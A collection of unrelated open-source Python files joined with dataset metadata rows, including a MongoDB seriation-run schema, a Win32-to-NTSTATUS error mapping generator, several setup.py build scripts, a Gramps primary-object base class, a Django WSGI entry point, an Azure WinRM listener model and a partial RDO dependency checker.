continuitygeosignificancefile = StringField()
continuitysumgraphbyweightpngfile = StringField()
continuitysumgraphbyweightgmlfile = StringField()
continuitysumgraphbycountpngfile = StringField()
continuitysumgraphbycountgmlfile = StringField()
continuityminmaxbyweightpngfile = StringField()
continuityminmaxbyweightgmlfile = StringField()
# files created by analysis scripts
# annotation in seriationct
annotatedfreqminmaxbyweightgmlfile = StringField()
annotatedfreqminmaxbyweightdotfile = StringField()
annotatedfreqminmaxbyweightpngfile = StringField()
annotatedcontminmaxbyweightgmlfile = StringField()
annotatedcontminmaxbyweightdotfile = StringField()
annotatedcontminmaxbyweightpngfile = StringField()
class SeriationRunParameters(EmbeddedDocument):
bootstrap_ci_flag = BooleanField()
bootstrap_significance = FloatField()
spatial_significance = BooleanField()
spatial_bootstrap_n = IntField()
xyfile_path = StringField(required=True)
inputfile = StringField(required=True)
outputdirectory = StringField(required=True)
continuity_seriation = BooleanField()
frequency_seriation = BooleanField()
full_cmdline = StringField()
class SeriationProfilingData(EmbeddedDocument):
bootstrap_ci_processing_time = FloatField()
total_frequency_processing_time = FloatField()
freq_main_processing_time = FloatField()
freq_spatial_processing_time = FloatField()
freq_output_processing_time = FloatField()
freq_minmaxweight_processing_time = FloatField()
freq_sumgraphweight_processing_time = FloatField()
freq_filter_processing_time = FloatField()
freq_excelmacro_processing_time = FloatField()
freq_excel_processing_time = FloatField()
freq_atlas_processing_time = FloatField()
freq_mst_processing_time = FloatField()
total_continuity_processing_time = FloatField()
total_occurrence_processing_time = FloatField()
class FrequencySeriationResult(EmbeddedDocument):
max_solution_size = IntField()
total_number_solutions = IntField()
spatial_significance_pvalue = FloatField()
class OccurrenceSeriationResult(EmbeddedDocument):
pass
class ContinuitySeriationResult(EmbeddedDocument):
spatial_significance_pvalue = FloatField()
class MinmaxSolutionMetrics(EmbeddedDocument):
"""
Scores or metrics from minmax seriation solutions
"""
score_chronological_accuracy = FloatField()
num_branch_points = IntField()
mean_degree = FloatField()
class SeriationRun(Document):
total_runtime = FloatField()
parameters = EmbeddedDocumentField(SeriationRunParameters)
profiling = EmbeddedDocumentField(SeriationProfilingData)
frequency_results = EmbeddedDocumentField(FrequencySeriationResult)
continuity_results = EmbeddedDocumentField(ContinuitySeriationResult)
occurrence_results = EmbeddedDocumentField(OccurrenceSeriationResult)
file_locations = EmbeddedDocumentField(SeriationFileLocations)
minmax_metrics = EmbeddedDocumentField(MinmaxSolutionMetrics)
version_used = StringField(required=True)
seriation_run_id = StringField(required=True)
num_assemblages = IntField()
num_classes = IntField()
date_seriation_run = DateTimeField(default=datetime.datetime.now)
source_identifier = StringField()
meta = {'allow_inheritance': True}
#TODO: Index the table to make annotation easy
class SeriationDatabase(object):
"""
persistence connection to the MongoDB database server
into which SeriationRun metadata, and in the future, primary
output, are stored.
"""
def __init__(self, args):
self.args = args
connect(db = args.database,
host = args.dbhost,
port = args.dbport,
username = args.dbuser,
password = args.dbpassword)
def store_run_metadata(self, stats_map, fileMap):
"""
        Saves the metadata for a single seriation run. The parameters
        subdocument is constructed from the command line args held
        by the object, and the stats_map argument is a dictionary
        returned by the seriate() method which contains timing
        and solution statistics.
        :param stats_map: dictionary of timing and solution statistics
"""
if self.args.xyfile == None:
xyfile = "none"
else:
xyfile = self.args.xyfile
floc = SeriationFileLocations()
#logger.debug("fileMap: %s", fileMap)
for fkey in fileMap.keys():
floc.__setattr__(fkey, str(fileMap[fkey]))
params = SeriationRunParameters()
params.inputfile = self.args.inputfile
params.bootstrap_ci_flag = bool(self.args.bootstrapCI)
params.bootstrap_significance = self.args.bootstrapSignificance
params.spatial_bootstrap_n = self.args.spatialbootstrapN
params.spatial_significance = bool(self.args.spatialsignificance)
params.xyfile_path = xyfile
params.outputdirectory = self.args.outputdirectory
params.continuity_seriation = bool(stats_map["continuity"])
params.frequency_seriation = bool(stats_map["frequency"])
params.full_cmdline = stats_map["cmdline"]
profile = SeriationProfilingData()
if 'bootstrap_ci_processing_time' in stats_map:
profile.bootstrap_ci_processing_time = stats_map["bootstrap_ci_processing_time"]
if 'frequency_processing_time' in stats_map:
profile.total_frequency_processing_time = stats_map['frequency_processing_time']
profile.freq_main_processing_time = stats_map['freq_main_processing_time']
profile.freq_filter_processing_time = stats_map['frequency_filter_solutions_time']
profile.freq_sumgraphweight_processing_time = stats_map["sumgraphweight_processing_time"]
profile.freq_output_processing_time = stats_map["frequency_output_processing_time"]
profile.freq_minmaxweight_processing_time = stats_map["minmax_weight_processing_time"]
if 'spatial_processing_time' in stats_map:
profile.freq_spatial_processing_time = stats_map["spatial_processing_time"]
if 'continuity_processing_time' in stats_map:
profile.total_continuity_processing_time = stats_map["continuity_processing_time"]
if 'occurrence_processing_time' in stats_map:
profile.total_occurrence_processing_time = stats_map["occurrence_processing_time"]
if 'mst_processing_time' in stats_map:
profile.freq_mst_processing_time = stats_map["mst_processing_time"]
if 'atlas_processing_time' in stats_map:
profile.freq_atlas_processing_time = stats_map["atlas_processing_time"]
if 'excel_processing_time' in stats_map:
profile.freq_excel_processing_time = stats_map["excel_processing_time"]
if 'excel_freqseriation_processing_time' in stats_map:
profile.freq_excelmacro_processing_time = stats_map["excel_freqseriation_processing_time"]
srun = SeriationRun()
srun.parameters = params
srun.profiling = profile
srun.file_locations = floc
srun.total_runtime = stats_map['execution_time']
srun.version_used = idss_version.__version__
srun.seriation_run_id = stats_map['seriation_run_id']
srun.num_assemblages = stats_map["num_assemblages"]
srun.num_classes = stats_map["num_classes"]
srun.source_identifier = self.args.source_identifier
# add the results from various seriation types
if self.args.frequency == 1:
freqres = FrequencySeriationResult()
freqres.max_solution_size = stats_map['max_seriation_size']
freqres.total_number_solutions = stats_map['total_number_solutions']
if 'frequency_geographic_pvalue' in stats_map:
freqres.spatial_significance_pvalue = stats_map['frequency_geographic_pvalue']
srun.frequency_results = freqres
if self.args.continuity == 1:
contres = ContinuitySeriationResult()
if 'continuity_geographic_pvalue' in stats_map:
contres.spatial_significance_pvalue = stats_map['continuity_geographic_pvalue']
srun.continuity_results = contres
# persist the entire set of results
srun.save()
|
apache-2.0
| -8,235,923,105,254,227,000 | 36.625899 | 119 | 0.711663 | false |
yogendersolanki91/winfsp
|
tools/gensrc/ntstatus.py
|
2
|
3934
|
#!/usr/bin/python
import sys
pairs = []
for line in sys.stdin:
pairs.extend(line.strip().split())
pairs = zip(pairs[::2], pairs[1::2])
fixed = {
'ERROR_ACCESS_DENIED': 'STATUS_ACCESS_DENIED',
'ERROR_CANNOT_IMPERSONATE': 'STATUS_CANNOT_IMPERSONATE',
'ERROR_CONNECTION_ABORTED': 'STATUS_CONNECTION_ABORTED',
'ERROR_CTX_LICENSE_NOT_AVAILABLE': 'STATUS_CTX_LICENSE_NOT_AVAILABLE',
'ERROR_DRIVER_BLOCKED': 'STATUS_DRIVER_BLOCKED',
'ERROR_EA_LIST_INCONSISTENT': 'STATUS_EA_LIST_INCONSISTENT',
'ERROR_FILE_INVALID': 'STATUS_FILE_INVALID',
'ERROR_HOST_UNREACHABLE': 'STATUS_HOST_UNREACHABLE',
'ERROR_INTERNAL_ERROR': 'STATUS_INTERNAL_ERROR',
'ERROR_INVALID_HANDLE': 'STATUS_INVALID_HANDLE',
'ERROR_INVALID_PARAMETER': 'STATUS_INVALID_PARAMETER',
'ERROR_INVALID_USER_BUFFER': 'STATUS_INVALID_USER_BUFFER',
'ERROR_LOGON_FAILURE': 'STATUS_LOGON_FAILURE',
'ERROR_MEDIA_CHANGED': 'STATUS_MEDIA_CHANGED',
'ERROR_NOT_LOCKED': 'STATUS_NOT_LOCKED',
'ERROR_NOT_SUPPORTED': 'STATUS_NOT_SUPPORTED',
'ERROR_NO_LOGON_SERVERS': 'STATUS_NO_LOGON_SERVERS',
'ERROR_NO_SUCH_LOGON_SESSION': 'STATUS_NO_SUCH_LOGON_SESSION',
'ERROR_NO_SUCH_PACKAGE': 'STATUS_NO_SUCH_PACKAGE',
'ERROR_NO_USER_SESSION_KEY': 'STATUS_NO_USER_SESSION_KEY',
'ERROR_PASSWORD_EXPIRED': 'STATUS_PASSWORD_EXPIRED',
'ERROR_PIPE_BUSY': 'STATUS_PIPE_BUSY',
'ERROR_STACK_OVERFLOW': 'STATUS_STACK_OVERFLOW',
'ERROR_TOO_MANY_NAMES': 'STATUS_TOO_MANY_NAMES',
'ERROR_TRUST_FAILURE': 'STATUS_TRUST_FAILURE',
'ERROR_ACCESS_DISABLED_BY_POLICY': 'STATUS_ACCESS_DISABLED_BY_POLICY_OTHER',
'ERROR_BAD_EXE_FORMAT': 'STATUS_INVALID_IMAGE_FORMAT',
'ERROR_BAD_NETPATH': 'STATUS_BAD_NETWORK_PATH',
'ERROR_BAD_PATHNAME': 'STATUS_OBJECT_PATH_INVALID',
'ERROR_BAD_PIPE': 'STATUS_INVALID_PIPE_STATE',
'ERROR_CRC': 'STATUS_CRC_ERROR',
'ERROR_DEV_NOT_EXIST': 'STATUS_DEVICE_DOES_NOT_EXIST',
'ERROR_DUP_NAME': 'STATUS_DUPLICATE_NAME',
'ERROR_FILE_CORRUPT': 'STATUS_FILE_CORRUPT_ERROR',
'ERROR_FILE_NOT_FOUND': 'STATUS_OBJECT_NAME_NOT_FOUND',
'ERROR_HANDLE_EOF': 'STATUS_END_OF_FILE',
'ERROR_INSUFFICIENT_BUFFER': 'STATUS_BUFFER_TOO_SMALL',
'ERROR_INVALID_ADDRESS': 'STATUS_MEMORY_NOT_ALLOCATED',
'ERROR_INVALID_FUNCTION': 'STATUS_NOT_IMPLEMENTED',
'ERROR_INVALID_NETNAME': 'STATUS_INVALID_ADDRESS_COMPONENT',
'ERROR_INVALID_ORDINAL': 'STATUS_ORDINAL_NOT_FOUND',
'ERROR_INVALID_PASSWORD': 'STATUS_WRONG_PASSWORD',
'ERROR_IO_DEVICE': 'STATUS_IO_DEVICE_ERROR',
'ERROR_LOCK_VIOLATION': 'STATUS_LOCK_NOT_GRANTED',
'ERROR_MORE_DATA': 'STATUS_BUFFER_OVERFLOW',
'ERROR_MUTUAL_AUTH_FAILED': 'STATUS_MUTUAL_AUTHENTICATION_FAILED',
'ERROR_NETNAME_DELETED': 'STATUS_NETWORK_NAME_DELETED',
'ERROR_NOACCESS': 'STATUS_ACCESS_VIOLATION',
'ERROR_NOT_ENOUGH_MEMORY': 'STATUS_NO_MEMORY',
'ERROR_NOT_OWNER': 'STATUS_RESOURCE_NOT_OWNED',
'ERROR_NOT_READY': 'STATUS_DEVICE_NOT_READY',
'ERROR_NO_DATA': 'STATUS_PIPE_EMPTY',
'ERROR_NO_MORE_ITEMS': 'STATUS_NO_MORE_ENTRIES',
'ERROR_NO_SYSTEM_RESOURCES': 'STATUS_INSUFFICIENT_RESOURCES',
'ERROR_PATH_NOT_FOUND': 'STATUS_OBJECT_PATH_NOT_FOUND',
'ERROR_PROC_NOT_FOUND': 'STATUS_PROCEDURE_NOT_FOUND',
'ERROR_REM_NOT_LIST': 'STATUS_REMOTE_NOT_LISTENING',
'ERROR_SERVICE_ALREADY_RUNNING': 'STATUS_IMAGE_ALREADY_LOADED',
'ERROR_UNEXP_NET_ERR': 'STATUS_UNEXPECTED_NETWORK_ERROR',
'ERROR_WRITE_PROTECT': 'STATUS_MEDIA_WRITE_PROTECTED',
}
errmap = {}
for pair in pairs:
if not pair[1] in fixed:
assert pair[1] not in errmap
errmap[pair[1]] = pair[0]
errmap.update(fixed)
if "FspNtStatusFromWin32" == sys.argv[1]:
for w, s in sorted(errmap.items()):
print "case %-40s return %s;" % (w + ':', s)
elif "FspWin32FromNtStatus" == sys.argv[1]:
for s, w in sorted(pairs):
print "case %-40s return %s;" % (s + ':', w)
|
gpl-3.0
| -1,532,350,312,026,019,800 | 45.833333 | 80 | 0.678953 | false |
godmar/problemtools
|
setup.py
|
1
|
2718
|
#!/usr/bin/env python2
from setuptools import setup, find_packages
from setuptools.command.bdist_egg import bdist_egg as _bdist_egg
import distutils.cmd
from distutils.command.build import build as _build
import os
import subprocess
class BuildSupport(distutils.cmd.Command):
"""A custom command to build the support programs."""
description = 'build the problemtools support programs'
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
"""Run command."""
# FIXME this seems very fragile...
dest = os.path.join(os.path.realpath(self.distribution.command_obj['build'].build_lib),
'problemtools', 'support')
command = ['make', '-C', 'support', 'install', 'DESTDIR=%s' % dest]
self.announce('Running command: %s' % ' '.join(command), level=distutils.log.INFO)
subprocess.check_call(command)
class bdist_egg(_bdist_egg):
"""Updated bdist_egg command that also builds support."""
def run(self):
self.run_command('build_support')
_bdist_egg.run(self)
class build(_build):
"""Updated build command that also builds support."""
def run(self):
self.run_command('build_support')
_build.run(self)
def get_version():
base_dir = os.path.dirname(__file__)
__version__ = None
try:
update_script = os.path.join(base_dir, 'admin', 'update_version.py.sh')
__version__ = subprocess.check_output([update_script])
except:
pass
if __version__ is None:
version_file = os.path.join(base_dir, 'problemtools', '_version.py')
with open(version_file, 'r') as version_in:
exec(version_in.read())
return __version__
setup(name='problemtools',
version=get_version(),
description='Kattis Problem Tools',
maintainer='Per Austrin',
maintainer_email='austrin@kattis.com',
url='https://github.com/Kattis/problemtools',
license='MIT',
packages=find_packages(),
entry_points = {
'console_scripts': [
'verifyproblem=problemtools.verifyproblem:main',
'problem2html=problemtools.problem2html:main',
'problem2pdf=problemtools.problem2pdf:main',
]
},
include_package_data=True,
install_requires=[
'PyYAML',
'plasTeX',
],
# Temporarily disabled, see setup.cfg
# For now tests can be run manually with pytest
# setup_requires=['pytest-runner'],
# tests_require=['pytest'],
cmdclass={
'build_support': BuildSupport,
'bdist_egg': bdist_egg,
'build': build
},
)
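# --- Illustrative note (not part of the original setup script) ---
# Because 'build' and 'bdist_egg' are overridden above to run 'build_support'
# first, a plain build is expected to also compile the support programs,
# e.g. (hypothetical invocation):
#
#   $ python2 setup.py build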
|
mit
| -8,236,077,664,496,998,000 | 27.610526 | 95 | 0.611111 | false |
CanonicalLtd/subiquity
|
setup.py
|
1
|
3933
|
#!/usr/bin/env python3
# -*- mode: python; -*-
#
# Copyright 2015 Canonical, Ltd.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This package is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
subiquity
=========
Ubuntu Server Installer
"""
import distutils.cmd
import distutils.command.build
import distutils.spawn
import glob
import os
import sys
from setuptools import setup, find_packages
class build_i18n(distutils.cmd.Command):
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
data_files = self.distribution.data_files
with open('po/POTFILES.in') as in_fp:
with open('po/POTFILES.in.tmp', 'w') as out_fp:
for line in in_fp:
if line.startswith('['):
continue
out_fp.write('../' + line)
os.chdir('po')
distutils.spawn.spawn([
'xgettext',
'--directory=.',
'--add-comments',
'--from-code=UTF-8',
'--keyword=pgettext:1c,2',
'--output=subiquity.pot',
'--files-from=POTFILES.in.tmp',
])
os.chdir('..')
os.unlink('po/POTFILES.in.tmp')
for po_file in glob.glob("po/*.po"):
lang = os.path.basename(po_file[:-3])
mo_dir = os.path.join("build", "mo", lang, "LC_MESSAGES")
mo_file = os.path.join(mo_dir, "subiquity.mo")
if not os.path.exists(mo_dir):
os.makedirs(mo_dir)
distutils.spawn.spawn(["msgfmt", po_file, "-o", mo_file])
targetpath = os.path.join("share/locale", lang, "LC_MESSAGES")
data_files.append((targetpath, (mo_file,)))
class build(distutils.command.build.build):
sub_commands = distutils.command.build.build.sub_commands + [
("build_i18n", None)]
with open(os.path.join(os.path.dirname(__file__),
'subiquitycore', '__init__.py')) as init:
lines = [line for line in init if 'i18n' not in line]
ns = {}
exec('\n'.join(lines), ns)
version = ns['__version__']
if sys.argv[-1] == 'clean':
print("Cleaning up ...")
os.system('rm -rf subiquity.egg-info build dist')
sys.exit()
setup(name='subiquity',
version=version,
description="Ubuntu Server Installer",
long_description=__doc__,
author='Canonical Engineering',
author_email='ubuntu-dev@lists.ubuntu.com',
url='https://github.com/CanonicalLtd/subiquity',
license="AGPLv3+",
packages=find_packages(exclude=["tests"]),
scripts=[
'bin/console-conf-wait',
'bin/console-conf-wrapper',
'bin/subiquity-debug',
'bin/subiquity-configure-apt',
'bin/subiquity-configure-run',
'bin/subiquity-loadkeys',
'bin/subiquity-service',
],
entry_points={
'console_scripts': [
'subiquity-server = subiquity.cmd.server:main',
'subiquity-tui = subiquity.cmd.tui:main',
'console-conf-tui = console_conf.cmd.tui:main',
('console-conf-write-login-details = '
'console_conf.cmd.write_login_details:main'),
],
},
data_files=[],
cmdclass={
'build': build,
'build_i18n': build_i18n,
},
)
|
agpl-3.0
| 8,198,292,872,499,578,000 | 29.253846 | 74 | 0.580219 | false |
sam-m888/gprime
|
gprime/lib/primaryobj.py
|
1
|
12459
|
#
# gPrime - A web-based genealogy program
#
# Copyright (C) 2000-2007 Donald N. Allingham
# Copyright (C) 2011 Tim G L Lyons
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
"""
Basic Primary Object class for Gramps.
"""
#-------------------------------------------------------------------------
#
# Standard Python modules
#
#-------------------------------------------------------------------------
from abc import abstractmethod
#-------------------------------------------------------------------------
#
# Gprime modules
#
#-------------------------------------------------------------------------
from .tableobj import TableObject
from .privacybase import PrivacyBase
from .citationbase import CitationBase
from .mediabase import MediaBase
from .tagbase import TagBase
#-------------------------------------------------------------------------
#
# Basic Primary Object class
#
#-------------------------------------------------------------------------
class BasicPrimaryObject(TableObject, PrivacyBase, TagBase):
"""
The BasicPrimaryObject is the base class for :class:`~.note.Note` objects.
It is also the base class for the :class:`PrimaryObject` class.
The :class:`PrimaryObject` is the base class for all other primary objects
in the database. Primary objects are the core objects in the database.
    Each object has a database handle and an ID value. The database
    handle is used as the record number for the database, and the Gramps
    ID is the user-visible version.
"""
def __init__(self, source=None):
"""
Initialize a PrimaryObject.
If source is None, both the ID and handle are assigned as empty
strings. If source is not None, then object is initialized from values
of the source object.
:param source: Object used to initialize the new object
:type source: PrimaryObject
"""
TableObject.__init__(self, source)
PrivacyBase.__init__(self, source)
TagBase.__init__(self)
if source:
self.gid = source.gid
else:
self.gid = None
@abstractmethod
def to_struct(self):
"""
Convert the data held in this object to a structure (eg,
struct) that represents all the data elements.
This method is used to recursively convert the object into a
self-documenting form that can easily be used for various
purposes, including diffs and queries.
These structures may be primitive Python types (string,
integer, boolean, etc.) or complex Python types (lists,
tuples, or dicts). If the return type is a dict, then the keys
of the dict match the fieldname of the object. If the return
struct (or value of a dict key) is a list, then it is a list
of structs. Otherwise, the struct is just the value of the
attribute.
:returns: Returns a struct containing the data of the object.
"""
@abstractmethod
def from_struct(self, struct):
"""
Given a struct data representation, return an object of this type.
These structures may be primitive Python types (string,
integer, boolean, etc.) or complex Python types (lists,
tuples, or dicts). If the return type is a dict, then the keys
of the dict match the fieldname of the object. If the return
struct (or value of a dict key) is a list, then it is a list
of structs. Otherwise, the struct is just the value of the
attribute.
:returns: Returns an object of this type.
"""
def set_gid(self, gid):
"""
Set the ID for the primary object.
:param gid: ID
:type gid: str
"""
self.gid = gid
def get_gid(self):
"""
Return the ID for the primary object.
:returns: ID associated with the object
:rtype: str
"""
return self.gid
def has_handle_reference(self, classname, handle):
"""
Return True if the object has reference to a given handle of given
primary object type.
:param classname: The name of the primary object class.
:type classname: str
:param handle: The handle to be checked.
:type handle: str
:returns:
Returns whether the object has reference to this handle of
this object type.
:rtype: bool
"""
return False
def remove_handle_references(self, classname, handle_list):
"""
Remove all references in this object to object handles in the list.
:param classname: The name of the primary object class.
:type classname: str
:param handle_list: The list of handles to be removed.
:type handle_list: str
"""
pass
def replace_handle_reference(self, classname, old_handle, new_handle):
"""
Replace all references to old handle with those to the new handle.
:param classname: The name of the primary object class.
:type classname: str
:param old_handle: The handle to be replaced.
:type old_handle: str
:param new_handle: The handle to replace the old one with.
:type new_handle: str
"""
pass
def has_citation_reference(self, handle):
"""
Indicate if the object has a citation references.
In the base class, no such references exist. Derived classes should
override this if they provide citation references.
"""
return False
def has_media_reference(self, handle):
"""
Indicate if the object has a media references.
In the base class, no such references exist. Derived classes should
override this if they provide media references.
"""
return False
def replace_citation_references(self, old_handle, new_handle):
"""
Replace all references to the old citation handle with those to the new
citation handle.
"""
pass
def replace_media_references(self, old_handle, new_handle):
"""
Replace all references to the old media handle with those to the new
media handle.
"""
pass
#-------------------------------------------------------------------------
#
# Primary Object class
#
#-------------------------------------------------------------------------
class PrimaryObject(BasicPrimaryObject):
"""
The PrimaryObject is the base class for all primary objects in the
database.
Primary objects are the core objects in the database.
    Each object has a database handle and an ID value. The database
    handle is used as the record number for the database, and the Gramps
    ID is the user-visible version.
"""
def __init__(self, source=None):
"""
Initialize a PrimaryObject.
If source is None, both the ID and handle are assigned as empty
strings. If source is not None, then object is initialized from values
of the source object.
:param source: Object used to initialize the new object
:type source: PrimaryObject
"""
BasicPrimaryObject.__init__(self, source)
@abstractmethod
def to_struct(self):
"""
Convert the data held in this object to a structure (eg,
struct) that represents all the data elements.
This method is used to recursively convert the object into a
self-documenting form that can easily be used for various
purposes, including diffs and queries.
These structures may be primitive Python types (string,
integer, boolean, etc.) or complex Python types (lists,
tuples, or dicts). If the return type is a dict, then the keys
of the dict match the fieldname of the object. If the return
struct (or value of a dict key) is a list, then it is a list
of structs. Otherwise, the struct is just the value of the
attribute.
:returns: Returns a struct containing the data of the object.
"""
@abstractmethod
def from_struct(self, struct):
"""
Given a struct data representation, return an object of this type.
These structures may be primitive Python types (string,
integer, boolean, etc.) or complex Python types (lists,
tuples, or dicts). If the return type is a dict, then the keys
of the dict match the fieldname of the object. If the return
struct (or value of a dict key) is a list, then it is a list
of structs. Otherwise, the struct is just the value of the
attribute.
:returns: Returns an object of this type.
"""
def has_handle_reference(self, classname, handle):
"""
Return True if the object has reference to a given handle of given
primary object type.
:param classname: The name of the primary object class.
:type classname: str
:param handle: The handle to be checked.
:type handle: str
:returns: Returns whether the object has reference to this handle
of this object type.
:rtype: bool
"""
if classname == 'Citation' and isinstance(self, CitationBase):
return self.has_citation_reference(handle)
elif classname == 'Media' and isinstance(self, MediaBase):
return self.has_media_reference(handle)
else:
return self._has_handle_reference(classname, handle)
def remove_event_references(self, handle_list):
new_list = [ref for ref in self.event_ref_list
if ref.ref not in handle_list]
self.event_ref_list = new_list
def remove_media_references(self, handle_list):
self.media_list = [ref for ref in self.media_list
if ref.ref not in handle_list]
def remove_tag_references(self, handle_list):
self.tag_list = [handle for handle in self.tag_list
if handle not in handle_list]
def remove_note_references(self, handle_list):
self.note_list = [handle for handle in self.note_list
if handle not in handle_list]
def remove_citation_references(self, handle_list):
self.citation_list = [handle for handle in self.citation_list
if handle not in handle_list]
def remove_place_references(self, handle_list):
self.placeref_list = [ref for ref in self.placeref_list
if ref.ref not in handle_list]
def replace_handle_reference(self, classname, old_handle, new_handle):
"""
Replace all references to old handle with those to the new handle.
:param classname: The name of the primary object class.
:type classname: str
:param old_handle: The handle to be replaced.
:type old_handle: str
:param new_handle: The handle to replace the old one with.
:type new_handle: str
"""
if classname == 'Citation' and isinstance(self, CitationBase):
self.replace_citation_references(old_handle, new_handle)
elif classname == 'Media' and isinstance(self, MediaBase):
self.replace_media_references(old_handle, new_handle)
else:
self._replace_handle_reference(classname, old_handle, new_handle)
def _has_handle_reference(self, classname, handle):
"""
Return True if the handle is referenced by the object.
"""
return False
def _replace_handle_reference(self, classname, old_handle, new_handle):
"""
Replace the handle reference with the new reference.
"""
pass
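# --- Illustrative note (not part of the original module) ---
# Concrete primary objects are expected to subclass PrimaryObject (usually
# together with mixins such as CitationBase or MediaBase) and implement the
# abstract to_struct()/from_struct() pair. A minimal hypothetical sketch:
#
#     class Stub(PrimaryObject):
#         def to_struct(self):
#             return {"handle": self.handle, "gid": self.gid}
#
#         def from_struct(self, struct):
#             self.handle = struct["handle"]
#             self.gid = struct["gid"]
#             return self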
|
gpl-2.0
| -4,829,788,241,042,503,000 | 34.69914 | 79 | 0.609278 | false |
aroth-arsoft/arsoft-web-filewatch
|
arsoft/web/filewatch/wsgi.py
|
1
|
1283
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# kate: space-indent on; indent-width 4; mixedindent off; indent-mode python;
"""
WSGI config for arsoft.web.filewatch project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "arsoft.web.filewatch.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
|
gpl-3.0
| -7,853,104,654,603,299,000 | 39.09375 | 80 | 0.788776 | false |
lmazuel/azure-sdk-for-python
|
azure-mgmt-compute/azure/mgmt/compute/v2016_04_30_preview/models/win_rm_listener.py
|
1
|
1843
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class WinRMListener(Model):
"""Describes Protocol and thumbprint of Windows Remote Management listener.
:param protocol: Specifies the protocol of listener. <br><br> Possible
values are: <br>**http** <br><br> **https**. Possible values include:
'Http', 'Https'
:type protocol: str or
~azure.mgmt.compute.v2016_04_30_preview.models.ProtocolTypes
:param certificate_url: This is the URL of a certificate that has been
uploaded to Key Vault as a secret. For adding a secret to the Key Vault,
see [Add a key or secret to the key
vault](https://docs.microsoft.com/azure/key-vault/key-vault-get-started/#add).
    In this case, your certificate needs to be the Base64 encoding of
the following JSON Object which is encoded in UTF-8: <br><br> {<br>
"data":"<Base64-encoded-certificate>",<br> "dataType":"pfx",<br>
"password":"<pfx-file-password>"<br>}
:type certificate_url: str
"""
_attribute_map = {
'protocol': {'key': 'protocol', 'type': 'ProtocolTypes'},
'certificate_url': {'key': 'certificateUrl', 'type': 'str'},
}
def __init__(self, **kwargs):
super(WinRMListener, self).__init__(**kwargs)
self.protocol = kwargs.get('protocol', None)
self.certificate_url = kwargs.get('certificate_url', None)
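# --- Illustrative usage sketch (not part of the generated SDK code) ---
# The vault URL below is a hypothetical placeholder.
#
#     listener = WinRMListener(
#         protocol='Https',
#         certificate_url='https://myvault.vault.azure.net/secrets/winrmcert')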
|
mit
| 5,345,644,278,437,206,000 | 42.880952 | 83 | 0.622897 | false |
mscook/nway-dbify
|
nway-dbify/parse.py
|
1
|
1080
|
# Copyright 2013 Mitchell Stanton-Cook. Licensed under the
# Educational Community License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may
# obtain a copy of the License at
#
# http://www.osedu.org/licenses/ECL-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS"
# BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing
# permissions and limitations under the License.
import sys
def parse_nway(file_path):
"""
    Parse an n-way comparison table. Columns: reference, position, type,
    base (N), evidence (N), annotations (N).
"""
with open(file_path) as fin:
strains = get_strains(fin.readline())
for line in fin:
            print(len(line.split('\t')))
def get_strains(line):
"""
Returns a list of strain IDs
"""
    number_of_strains = (len(line.split('\t')[4:]) - 1) // 3
return line.split('\t')[4:(4+number_of_strains)]
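# Hedged illustration (not part of the original module) of the column
# arithmetic above: with four fixed leading columns and 3*N+1 trailing
# columns, get_strains() returns the first N trailing columns as strain IDs.
# The field names below are made up; the real nway header layout is an
# assumption of this example.
if __name__ == '__main__':
    demo_header = '\t'.join(['Reference', 'Position', 'Type', 'Base',
                             'strainA', 'strainB',
                             'evA', 'evB', 'annA', 'annB', 'extra'])
    print(get_strains(demo_header))   # ['strainA', 'strainB']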
|
apache-2.0
| -5,660,395,515,860,145,000 | 33.83871 | 73 | 0.662963 | false |
rdo-infra/releng
|
rdoutils/cmd/check_dependants.py
|
1
|
10118
|
#! /usr/bin/python3
#
# Mostly copied code from find_unblocked_orphans.py in fedora
#
# Credits to original authors:
# Jesse Keating <jkeating@redhat.com>
# Till Maas <opensource@till.name>
#
# Copyright (c) 2009-2013 Red Hat
# SPDX-License-Identifier: GPL-2.0
#
# From:
# https://pagure.io/releng/blob/main/f/scripts/find_unblocked_orphans.py
from collections import OrderedDict
import argparse
import os
import sys
import dnf
def get_repos(release):
RDO_TRUNK_C8 = {
"rdo-baremetal": "http://trunk.rdoproject.org/centos8-%s/component/baremetal/current" % release, # noqa
"rdo-cinder": "http://trunk.rdoproject.org/centos8-%s/component/cinder/current" % release, # noqa
